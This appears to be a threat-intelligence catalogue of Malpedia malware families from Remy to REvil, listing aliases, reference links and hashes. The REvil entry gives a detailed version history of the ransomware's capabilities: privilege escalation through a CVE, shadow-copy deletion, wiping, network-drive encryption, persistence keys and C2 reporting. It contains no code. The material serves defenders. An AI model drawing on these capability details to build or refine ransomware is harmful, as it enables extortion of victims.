https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments
https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-2.html
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf
https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-3.html
https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis.html

Remy

The tag is: misp-galaxy:malpedia="Remy"

Remy is also known as:

WINDSHIELD

Table 2514. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.remy
https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html
https://www.secureworks.com/research/threat-profiles/tin-woodlawn

Rerdom

The tag is: misp-galaxy:malpedia="Rerdom"

Rerdom is also known as:

Table 2515. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom
https://www.coresecurity.com/sites/default/files/resources/2017/03/Behind_Malware_Infection_Chain.pdf

Retadup

The tag is: misp-galaxy:malpedia="Retadup"

Retadup is also known as:

Table 2516. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup
http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/
https://decoded.avast.io/janvojtesek/putting-an-end-to-retadup-a-malicious-worm-that-infected-hundreds-of-thousands/

Retefe (Windows)

Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. It’s primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic.

The tag is: misp-galaxy:malpedia="Retefe (Windows)"

Retefe (Windows) is also known as:

Tsukuba
Werdlod

Table 2517. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe
https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe
https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/
https://github.com/cocaman/retefe
https://www.govcert.admin.ch/blog/33/the-retefe-saga
https://www.govcert.admin.ch/blog/35/reversing-retefe
https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/
https://github.com/Tomasuh/retefe-unpacker
https://vulnerability.ch/2019/05/analysing-retefe-with-sysmon-and-splunk/

Retro

The tag is: misp-galaxy:malpedia="Retro"

Retro is also known as:

Table 2518. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.retro
https://blog.360totalsecurity.com/en/analysis-cve-2018-8174-vbscript-0day-apt-actor-related-office-targeted-attack/
https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/
https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html

Revenge RAT

The tag is: misp-galaxy:malpedia="Revenge RAT"

Revenge RAT is also known as:

Revetrat

Table 2519. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat
https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/
https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html
https://isc.sans.edu/diary/rss/22590
https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns
https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/
https://securelist.com/revengehotels/95229/
https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html
https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader
https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated
https://yoroi.company/research/the-evolution-of-aggah-from-roma225-to-the-rg-campaign/
https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/
https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries
https://blogs.360.cn/post/APT-C-44.html
https://blog.reversinglabs.com/blog/rats-in-the-library
https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america
https://blog.reversinglabs.com/blog/dotnet-loaders
https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/
https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g

ReverseRAT

The tag is: misp-galaxy:malpedia="ReverseRAT"

ReverseRAT is also known as:

Table 2520. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.reverse_rat
https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf

Reveton

Ransomware.

The tag is: misp-galaxy:malpedia="Reveton"

Reveton is also known as:

Table 2521. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.reveton
https://krebsonsecurity.com/2012/08/inside-a-reveton-ransomware-operation/

REvil (Windows)

REvil Beta MD5: bed6fc04aeb785815744706239a1f243 SHA1: 3d0649b5f76dbbff9f86b926afbd18ae028946bf SHA256: 3641b09bf6eae22579d4fd5aae420476a134f5948966944189a70afd8032cb45 * Privilege escalation via CVE-2018-8453 (64-bit only) * Rerun with RunAs to elevate privileges * Implements a requirement that if "exp" is set, privilege escalation must be successful for full execution to occur * Implements target whitelisting using GetKetboardLayoutList * Contains debug console logging functionality * Defines the REvil registry root key as SOFTWARE\!test * Includes two variable placeholders in the ransom note: UID & KEY * Terminates processes specified in the "prc" configuration key prior to encryption * Deletes shadow copies and disables recovery * Wipes contents of folders specified in the "wfld" configuration key prior to encryption * Encrypts all non-whitelisted files on fixed drives * Encrypts all non-whitelisted files on network mapped drives if it is running with System-level privileges or can impersonate the security context of explorer.exe * Partially implements a background image setting to display a basic "Image text" message * Sends encrypted system data to a C2 domain via an HTTPS POST request (URI path building is not implemented.)

REvil 1.00
MD5: 65aa793c000762174b2f86077bdafaea
SHA1: 95a21e764ad0c98ea3d034d293aee5511e7c8457
SHA256: f0c60f62ef9ffc044d0b4aeb8cc26b971236f24a2611cb1be09ff4845c3841bc
* Adds 32-bit implementation of CVE-2018-8453 exploit
* Removes console debug logging
* Changes the REvil registry root key to SOFTWARE\recfg
* Removes the System/Impersonation success requirement for encrypting network mapped drives
* Adds a "wipe" key to the configuration for optional folder wiping
* Fully implements the background image setting and leverages values defined in the "img" configuration key
* Adds an EXT variable placeholder to the ransom note to support UID, KEY, and EXT
* Implements URI path building so encrypted system data is sent to a C2 pseudo-random URL
* Fixes the function that returns the victim's username so the correct value is placed in the stats JSON data

REvil 1.01 MD5: 2abff29b4d87f30f011874b6e98959e9 SHA1: 9d1b61b1cba411ee6d4664ba2561fa59cdb0732c SHA256: a88e2857a2f3922b44247316642f08ba8665185297e3cd958bbd22a83f380feb * Removes the exp/privilege escalation requirement for full execution and encrypts data regardless of privilege level * Makes encryption of network mapped drives optional by adding the "-nolan" argument

REvil 1.02
MD5: 4af953b20f3a1f165e7cf31d6156c035
SHA1: b859de5ffcb90e4ca8e304d81a4f81e8785bb299
SHA256: 89d80016ff4c6600e8dd8cfad1fa6912af4d21c5457b4e9866d1796939b48dc4
* Enhances whitelisting validation by adding inspection of GetUserDefaultUILanguage and GetSystemDefaultUILanguage
* Partially implements "lock file" logic by generating a lock filename based on the first four bytes of the Base64-decoded pk key, appending a .lock file extension, and adding the filename to the list of whitelisted files in the REvil configuration (It does not appear that this value is referenced after it is created and stored in memory. There is no evidence that a lock file is dropped to disk.)
* Enhances folder whitelisting logic that take special considerations if the folder is associated with "program files" directories
* Hard-codes whitelisting of all direct content within the Program Files or Program Files x86 directories
* Hard-codes whitelisting of "sql" subfolders within program files
* Encrypts program files sub-folders that does not contain "sql" in the path
* Compares other folders to the list of whitelisted folders specified in the REvil configuration to determine if they are whitelisted
* Encodes stored strings used for URI building within the binary and decodes them in memory right before use
* Introduces a REvil registry root key "sub_key" registry value containing the attacker's public key

REvil 1.03 MD5: 3cae02306a95564b1fff4ea45a7dfc00 SHA1: 0ce2cae5287a64138d273007b34933362901783d SHA256: 78fa32f179224c46ae81252c841e75ee4e80b57e6b026d0a05bb07d34ec37bbf * Removes lock file logic that was partially implemented in 1.02 * Leverages WMI to continuously monitor for and kill newly launched processes whose names are listed in the prc configuration key (Previous versions performed this action once.) * Encodes stored shellcode * Adds the -path argument: * Does not wipe folders (even if wipe == true) * Does not set desktop background * Does not contact the C2 server (even if net == true) * Encrypts files in the specified folder and drops the ransom note * Changes the REvil registry root key to SOFTWARE\QtProject\OrganizationDefaults * Changes registry key values from -→ to: * sub_key -→ pvg * pk_key -→ sxsP * sk_key -→ BDDC8 * 0_key -→ f7gVD7 * rnd_ext -→ Xu7Nnkd * stat -→ sMMnxpgk

REvil 1.04
MD5: 6e3efb83299d800edf1624ecbc0665e7
SHA1: 0bd22f204c5373f1a22d9a02c59f69f354a2cc0d
SHA256: 2ca64feaaf5ab6cf96677fbc2bc0e1995b3bc93472d7af884139aa757240e3f6
* Leverages PowerShell and WMI to delete shadow copies if the victim's operating system is newer than Windows XP (For Windows XP or older, it uses the original command that was executed in all previous REvil versions.)
* Removes the folder wipe capability
* Changes the REvil registry root key to SOFTWARE\GitForWindows
* Changes registry key values from --> to:
  * pvg --> QPM
  * sxsP --> cMtS
  * BDDC8 --> WGg7j
  * f7gVD7 --> zbhs8h
  * Xu7Nnkd --> H85TP10
  * sMMnxpgk --> GCZg2PXD

REvil v1.05 MD5: cfefcc2edc5c54c74b76e7d1d29e69b2 SHA1: 7423c57db390def08154b77e2b5e043d92d320c7 SHA256: e430479d1ca03a1bc5414e28f6cdbb301939c4c95547492cdbe27b0a123344ea * Add new 'arn' configuration key that contains a boolean true/false value that controls whether or not to implement persistence. * Implements persistence functionality via registry Run key. Data for value is set to the full path and filename of the currently running executable. The executable is never moved into any 'working directory' such as %AppData% or %TEMP% as part of the persistence setup. The Reg Value used is the hardcoded value of 'lNOWZyAWVv' : * SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lNOWZyAWVv * Before exiting, REvil sets up its malicious executable to be deleted upon reboot by issuing a call to MoveFileExW and setting the destination to NULL and the flags to 4 (MOVEFILE_DELAY_UNTIL_REBOOT). This breaks persistence however as the target executable specified in the Run key will no longer exist once this is done. * Changes registry key values from -→ to: * QPM -→ tgE * cMtS -→ 8K09 * WGg7j -→ xMtNc * zbhs8h -→ CTgE4a * H85TP10 -→ oE5bZg0 * GCZg2PXD -→ DC408Qp4

REvil v1.06
MD5: 65ff37973426c09b9ff95f354e62959e
SHA1: b53bc09cfbd292af7b3609734a99d101bd24d77e
SHA256: 0e37d9d0a7441a98119eb1361a0605042c4db0e8369b54ba26e6ba08d9b62f1e
* Updated string decoding function to break existing yara rules. Likely the result of the blog posted by us.
* Modified handling of network file encryption. Now explicitly passes every possible "Scope" constant to the WNetOpenEnum function when looking for files to encrypt. It also changed the 'Resource Type" from RESOURCETYPE_DISK to RESOURCETYPE_ANY which will now include things like mapped printers.
* Persistence registry value changed from 'lNOWZyAWVv' to 'sNpEShi30R'
* Changes registry key values from --> to:
  * tgE --> 73g
  * 8K09 --> vTGj
  * xMtNc --> Q7PZe
  * CTgE4a --> BuCrIp
  * oE5bZg0 --> lcZd7OY
  * DC408Qp4 --> sLF86MWC

REvil v1.07 MD5: ea4cae3d6d8150215a4d90593a4c30f2 SHA1: 8dcbcbefaedf5675b170af3fd44db93ad864894e SHA256: 6a2bd52a5d68a7250d1de481dcce91a32f54824c1c540f0a040d05f757220cd3 TBD

The tag is: misp-galaxy:malpedia="REvil (Windows)"

REvil (Windows) is also known as:

Sodin
Sodinokibi

Table 2522. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.revil
https://therecord.media/i-scrounged-through-the-trash-heaps-now-im-a-millionaire-an-interview-with-revils-unknown/
https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/
https://twitter.com/VK_Intel/status/1374571480370061312?s=20
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound
https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html
https://blog.group-ib.com/REvil_RaaS
https://www.tgsoft.it/english/news_archivio_eng.asp?id=1004
https://www.pandasecurity.com/emailhtml/2007-CAM-RANSOMWARE-AD360-WG/2006-Report-Sodinokibi-EN.pdf
https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html
https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/
https://www.bleepingcomputer.com/news/security/revil-ransomware-devs-added-a-backdoor-to-cheat-affiliates/
https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-threatens-to-publish-data-of-automotive-group/
https://twitter.com/fwosar/status/1411281334870368260
https://www.zdnet.com/article/revil-ransomware-gang-launches-auction-site-to-sell-stolen-data/
https://news.sophos.com/en-us/2021/06/11/relentless-revil-revealed/
https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/
https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf
https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/
https://www.netskope.com/blog/netskope-threat-coverage-revil
https://krebsonsecurity.com/2019/07/is-revil-the-new-gandcrab-ransomware/
https://twitter.com/VK_Intel/status/1411066870350942213
https://public.intel471.com/blog/revil-ransomware-interview-russian-osint-100-million/
https://medium.com/@underthebreach/tracking-down-revils-lalartu-by-utilizing-multiple-osint-methods-2bf3a6c65a80
https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89
https://www.advanced-intel.com/post/revil-vanishes-from-underground-infrastructure-down-support-staff-adverts-silent
https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version
https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf
https://www.washingtonpost.com/national-security/ransomware-fbi-revil-decryption-key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html
https://www.flashpoint-intel.com/blog/revils-cryptobackdoor-con-ransomware-groups-tactics-roil-affiliates-sparking-a-fallout/
https://f.hubspotusercontent10.net/hubfs/5943619/Whitepaper-Downloads/Ransomware_in_ICS_Environments_Whitepaper_10_12_20.pdf
http://www.secureworks.com/research/threat-profiles/gold-southfield
https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/
https://twitter.com/svch0st/status/1411537562380816384
https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/
https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-says-travelex-will-pay-one-way-or-another/
https://www.youtube.com/watch?v=P8o6GItci5w
https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/
https://www.digitalshadows.com/blog-and-research/competitions-on-russian-language-cybercriminal-forums-sharing-expertise-or-threat-actor-showboating/
https://www.bleepingcomputer.com/news/security/another-ransomware-will-now-publish-victims-data-if-not-paid/
https://blog.truesec.com/2021/07/06/kaseya-vsa-zero-day-exploit
https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/
https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/
https://asec.ahnlab.com/ko/19860/
https://drive.google.com/file/d/1ph1E0onZ7TiNyG87k4WjofCKNuCafMLk/view
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://securityaffairs.co/wordpress/98694/malware/sodinokibi-kenneth-cole-data-breach.html
https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/
https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/
https://awakesecurity.com/blog/threat-hunting-for-revil-ransomware/
https://us-cert.cisa.gov/ncas/alerts/aa20-345a
https://twitter.com/fwosar/status/1420119812815138824
https://hatching.io/blog/ransomware-part2
https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout
https://www.flashpoint-intel.com/blog/possible-universal-revil-master-key-posted-to-xss/
https://www.secureworks.com/research/lv-ransomware
https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/
https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/
https://sites.temple.edu/care/ci-rw-attacks/
https://www.huntress.com/blog/security-researchers-hunt-to-discover-origins-of-the-kaseya-vsa-mass-ransomware-incident
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/undressing-the-revil/
https://community.riskiq.com/article/3315064b
https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf
https://www.bleepingcomputer.com/news/security/ransomware-threatens-to-reveal-companys-dirty-secrets/
https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf
https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/
https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware
https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released
https://ke-la.com/easy-way-in-5-ransomware-victims-had-their-pulse-secure-vpn-credentials-leaked/
https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/
https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf
https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment
https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/
https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/
https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/
https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/
https://twitter.com/alex_il/status/1412403420217159694[https://twitter.com/alex_il/status/1412403420217159694]
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf
https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf
https://blog.gigamon.com/2021/07/08/observations-and-recommendations-from-the-ongoing-revil-kaseya-incident/
https://twitter.com/Jacob_Pimental/status/1391055792774729728
https://twitter.com/SophosLabs/status/1412056467201462276
https://threatpost.com/ransomware-revil-sites-disappears/167745/
https://searchsecurity.techtarget.com/feature/Ransomware-negotiations-An-inside-look-at-the-process
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf
https://blog.morphisec.com/real-time-prevention-of-the-kaseya-vsa-supply-chain-revil-ransomware-attack
https://www.bleepingcomputer.com/news/security/kaseya-obtains-universal-decryptor-for-revil-ransomware-victims/
https://www.certego.net/en/news/malware-tales-sodinokibi/
https://www.secureworks.com/blog/revil-the-gandcrab-connection
https://f.hubspotusercontent10.net/hubfs/7095517/FLINT-Kaseya-Another%20Massive%20Heist%20by%20REvil.pdf
https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities
https://www.appgate.com/blog/electric-company-ransomware-attack-calls-for-14-million-in-ransom
https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-1-000-plus-companies-in-msp-supply-chain-attack/
https://www.nytimes.com/2019/08/22/us/ransomware-attacks-hacking.html
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti
https://www.kaseya.com/potential-attack-on-kaseya-vsa/
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/kaseya-ransomware-supply-chain
https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf
https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/
https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/
https://www.goggleheadedhacker.com/blog/post/reversing-crypto-functions
https://blag.nullteilerfrei.de/2020/02/02/defeating-sodinokibi-revil-string-obfuscation-in-ghidra/
https://www.bleepingcomputer.com/news/security/a-look-inside-the-highly-profitable-sodinokibi-ransomware-business/
https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/
https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf
https://vimeo.com/449849549
https://blag.nullteilerfrei.de/2019/11/09/api-hashing-why-and-how/
https://gist.githubusercontent.com/fwosar/a63e1249bfccb8395b961d3d780c0354/raw/312b2bbc566cbee2dac7b143dc143c1913ddb729/revil.json
https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/
https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/
https://ke-la.com/darknet-threat-actors-are-not-playing-games-with-the-gaming-industry/
https://twitter.com/R3MRUM/status/1412064882623713283
https://blogs.blackberry.com/en/2021/05/threat-thursday-dr-revil-ransomware-strikes-again-employs-double-extortion-tactics
https://www.domaintools.com/resources/blog/revealing-revil-ransomware-with-domaintools-and-maltego
https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b
https://www.crowdstrike.com/blog/how-crowdstrike-stops-revil-ransomware-from-kaseya-attack/
https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/
https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-new-york-airport-systems/
https://www.trendmicro.com/en_us/research/21/a/sodinokibi-ransomware.html
https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/
https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/
https://unit42.paloaltonetworks.com/threat-brief-kaseya-vsa-ransomware-attacks/
https://twitter.com/SophosLabs/status/1413616952313004040?s=20
https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-managedcom-hosting-provider-500k-ransom/
https://blog.amossys.fr/sodinokibi-malware-analysis.html
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/
https://twitter.com/LloydLabs/status/1411098844209819648
https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/
https://www.elastic.co/blog/elastic-security-prevents-100-percent-of-revil-ransomware-samples?utm_content=&utm_medium=social&utm_source=twitter
https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html
https://securelist.com/ransomware-world-in-2021/102169/
https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.youtube.com/watch?v=tZVFMVm5GAk
https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs
https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/
https://www.bleepingcomputer.com/news/security/revil-ransomwares-servers-mysteriously-come-back-online/
https://www.splunk.com/en_us/blog/security/kaseya-sera-what-revil-shall-encrypt-shall-encrypt.html
https://www.bleepingcomputer.com/news/security/revil-ransomware-gang-claims-over-100-million-profit-in-a-year/
https://unit42.paloaltonetworks.com/prometheus-ransomware/
https://threatintel.blog/OPBlueRaven-Part1/
https://velzart.nl/blog/ransomeware/
https://isc.sans.edu/diary/27012
https://ke-la.com/ransomware-gangs-are-starting-to-look-like-oceans-11/
https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf
https://www.youtube.com/watch?v=LUxOcpIRxmg
https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/
https://securelist.com/sodin-ransomware/91473/
https://www.flashpoint-intel.com/blog/chatter-indicates-blackmatter-as-revil-successor/
https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/
https://unit42.paloaltonetworks.com/revil-threat-actors/
https://www.splunk.com/en_us/blog/security/revil-ransomware-threat-research-update-and-detections.html
https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/
https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide
https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/
https://medium.com/s2wlab/deep-analysis-of-revil-ransomware-written-in-korean-d1899c0e9317
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?blob=publicationFile&v=2[https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?blob=publicationFile&v=2]
https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/
https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling
https://www.crowdstrike.com/blog/how-falcon-complete-thwarted-a-revil-ransomware-attack/
https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/
https://www.goggleheadedhacker.com/blog/post/sodinokibi-ransomware-analysis
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/
https://www.youtube.com/watch?v=QYQQUUpU04s
https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/
https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/
https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/
https://www.kpn.com/security-blogs/Tracking-REvil.htm
https://www.zscaler.com/blogs/security-research/kaseya-supply-chain-ransomware-attack-technical-analysis-revil-payload
https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
https://twitter.com/SyscallE/status/1411074271875670022
https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel
https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html
https://www.bleepingcomputer.com/news/security/revil-ransomware-gangs-web-sites-mysteriously-shut-down/
https://twitter.com/resecurity_com/status/1412662343796813827
https://twitter.com/Jacob_Pimental/status/1398356030489251842?s=20
https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/
https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/
https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html
https://tehtris.com/fr/peut-on-neutraliser-un-ransomware-lance-en-tant-que-system-sur-des-milliers-de-machines-en-meme-temps/
https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-travelex-demands-3-million/
https://news.sophos.com/en-us/2021/06/30/mtr-in-real-time-hand-to-hand-combat-with-revil-ransomware-chasing-a-2-5-million-pay-day/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://securityintelligence.com/posts/sodinokibi-revil-ransomware-disrupt-trade-secrets/
https://www.cnbc.com/2021/04/23/axis-of-revil-inside-the-hacker-collective-taunting-apple.html
https://www.youtube.com/watch?v=l2P5CMH9TE0
https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f
https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/
https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/
https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20
https://www.grahamcluley.com/travelex-paid-ransom/
https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain
https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/
https://www.secureworks.com/research/revil-sodinokibi-ransomware
https://www.bleepingcomputer.com/news/security/kaseyas-universal-revil-decryption-key-leaked-on-a-hacking-forum/
https://www.bleepingcomputer.com/news/security/fbi-revil-cybergang-behind-the-jbs-ransomware-attack/
https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights
